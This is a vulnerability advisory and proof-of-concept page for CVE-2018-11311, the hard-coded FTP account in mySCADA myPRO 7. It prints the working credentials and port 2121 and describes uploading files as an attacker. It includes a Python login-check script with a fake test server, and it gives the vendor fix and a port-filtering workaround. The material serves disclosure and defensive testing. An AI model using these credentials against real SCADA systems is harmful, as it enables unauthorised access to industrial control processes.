
CVE-2018-11311 PoC: mySCADA myPRO Security Vulnerability

Related vulnerability
Title: mySCADA myPRO Security Vulnerability (CVE-2018-11311)
Description: mySCADA myPRO is an industrial visualisation and control system from mySCADA Technologies (Czech Republic). The file 'myscadagate.exe' in mySCADA myPRO 7 contains a security vulnerability caused by a hard-coded FTP account (username: myscada, password: Vikuk63). A remote attacker can use this account to log in to the FTP server on port 2121 and upload files or list directories.
Description
CVE-2018-11311 | mySCADA myPRO 7 Hardcoded FTP Username and Password Vulnerability
Introduction
# mySCADA myPRO 7 Hardcoded Credentials
# CVE-2018-11311

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11311

https://www.exploit-db.com/exploits/44656/

http://myscada.org/wp-content/uploads/downloads/BOXv7/changelog.txt

```
Changelog v7.0.46
-----------------
- fix of possible vulnerability as described here https://vuldb.com/?id.118038
  - This release disables download of project using FTP protocol. The download is performed over secure SSL channel now. 
  - You don't have to do anything to activate this, it is done automatically. After the installation restart your system TWICE please. 
- minor bug fixes - speed optimisation  
```


# I. Background
myPRO is a professional HMI/SCADA system designed primarily for the visualisation and control of industrial processes. According to the vendor it is an effective and innovative solution for any industry that needs non-stop operation, and it guarantees reliable supervision, a user-friendly interface and superior security.
It supports Windows (32/64-bit), Mac OS X and Linux (32/64-bit).
(more: https://www.myscada.org/mypro/)

# II. Problem Description
In the current version of myPRO (v7), reverse engineering of the program shows that the username and password of the FTP server listening on port 2121 are hard-coded in the binary ('myscadagate.exe'). Anyone who connects to that FTP server with these credentials can upload files to, or download files from, the server running myPRO.

# III. Technical
First, I determined which ports myPRO listens on. The netstat command lists the listening ports and the processes bound to them. As the screenshots show, a default myPRO installation opens many ports. The vulnerability affects all supported platforms.

## (username:password) = (myscada:Vikuk63)

![alt tag](https://emreovunc.com/images/mySCADA_myPRO/open-ports.png)

![alt tag](https://emreovunc.com/images/mySCADA_myPRO/netstat-1.png)

![alt tag](https://emreovunc.com/images/mySCADA_myPRO/netstat-2.png)

In my first tests on Windows, myPRO runs many processes, and 'myscadagate.exe' is the one listening on port 2121. Port 2121 deserves attention because it is a common alternative port for an FTP service.

![alt tag](https://emreovunc.com/images/mySCADA_myPRO/windows-processes.png)

![alt tag](https://emreovunc.com/images/mySCADA_myPRO/port-2121.png)

As the screenshot below shows, the username and password (myscada:Vikuk63) are embedded in the program itself. Using these credentials, I gained access by connecting to port 2121 of the myPRO server with an ordinary FTP client and was able to upload files.

![alt tag](https://emreovunc.com/images/mySCADA_myPRO/username&password.png)

![alt tag](https://emreovunc.com/images/mySCADA_myPRO/file-upload-2.png)

![alt tag](https://emreovunc.com/images/mySCADA_myPRO/file-upload.png)
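The manual step above ("connect to port 2121 with any FTP client and log in as myscada:Vikuk63") can be scripted as a safe check for an assessment. The following is an added example, not code from the original advisory or from mySCADA: `check_hardcoded_ftp_login` only sends USER/PASS and never uploads or lists anything, and `FakeMyProFtp` is a constructed minimal FTP responder (not myscadagate.exe) that accepts exactly one account, so the exchange can be exercised offline. The banner text and port the fake server uses are assumptions; the credentials and port 2121 are the ones documented on this page.

```python
"""Scripted check for the hard-coded myPRO FTP account (CVE-2018-11311).

Added example, not part of the original advisory. The real target is the
FTP service of myscadagate.exe on TCP/2121; FakeMyProFtp is a constructed
test double so the USER/PASS exchange can be run without a myPRO install.
"""
import socket
import threading
from ftplib import FTP, error_perm

# Values as documented in the advisory.
MYPRO_FTP_PORT = 2121
MYPRO_FTP_USER = "myscada"
MYPRO_FTP_PASS = "Vikuk63"


def check_hardcoded_ftp_login(host, port=MYPRO_FTP_PORT, timeout=5.0):
    """Return (True, reply) if the hard-coded account logs in, else (False, reason).

    Only USER and PASS are sent; no file transfer or directory listing is
    attempted, so the check is non-destructive on a production HMI.
    """
    ftp = FTP()
    try:
        ftp.connect(host, port, timeout=timeout)
        reply = ftp.login(MYPRO_FTP_USER, MYPRO_FTP_PASS)  # raises on 5xx
        return True, reply
    except error_perm as exc:      # e.g. "530 Login incorrect": account removed/changed
        return False, str(exc)
    except OSError as exc:         # refused/timed out: port closed or filtered
        return False, f"no FTP service: {exc}"
    finally:
        try:
            ftp.quit()
        except Exception:
            ftp.close()


class FakeMyProFtp(threading.Thread):
    """Constructed FTP responder that accepts one fixed (user, password) pair.

    It speaks just enough of RFC 959 (220/331/230/530/221) for ftplib's
    login sequence. Binds to an ephemeral loopback port, not 2121.
    """

    def __init__(self, accepted=(MYPRO_FTP_USER, MYPRO_FTP_PASS)):
        super().__init__(daemon=True)
        self.accepted = accepted
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]

    def run(self):
        while True:
            conn, _ = self.sock.accept()
            threading.Thread(target=self._session, args=(conn,), daemon=True).start()

    def _session(self, conn):
        conn.sendall(b"220 myPRO gate FTP ready\r\n")   # banner text is assumed
        user = None
        with conn.makefile("rb") as lines:
            for raw in lines:
                cmd, _, arg = raw.decode("ascii", "replace").rstrip("\r\n").partition(" ")
                cmd = cmd.upper()
                if cmd == "USER":
                    user = arg
                    conn.sendall(b"331 Password required\r\n")
                elif cmd == "PASS":
                    if (user, arg) == self.accepted:
                        conn.sendall(b"230 Login successful\r\n")
                    else:
                        conn.sendall(b"530 Login incorrect\r\n")
                elif cmd == "QUIT":
                    conn.sendall(b"221 Goodbye\r\n")
                    break
                else:
                    conn.sendall(b"502 Command not implemented\r\n")
        conn.close()


def demo_against_fake_server(accepted=(MYPRO_FTP_USER, MYPRO_FTP_PASS)):
    """Run the check against a fake server that accepts `accepted`."""
    srv = FakeMyProFtp(accepted)
    srv.start()
    return check_hardcoded_ftp_login("127.0.0.1", srv.port)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    vulnerable, reply = check_hardcoded_ftp_login(target)
    print(("VULNERABLE: " if vulnerable else "not vulnerable: ") + reply)
```

Run it as `python check_mypro_ftp.py <host>` against a myPRO server; a `230` reply means the hard-coded account is still accepted, a `530` means the account was removed or its password changed, and a connection error means port 2121 is closed or filtered (the workaround described in the next section).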

# IV. Solution
As a workaround, restrict access to port 2121 from outside the network. At the time this advisory was written the vendor had not released a patch; the v7.0.46 changelog quoted above states that project download over FTP was later disabled in favour of an SSL channel, so installations on older versions should update or keep the port filtered.
File snapshot

```
/data/pocs/f3ffb38b2cd8c5ee0fff150088dedb651592774e
├── [2.9K] README.md
└── [  16] username-password.txt

0 directories, 2 files
```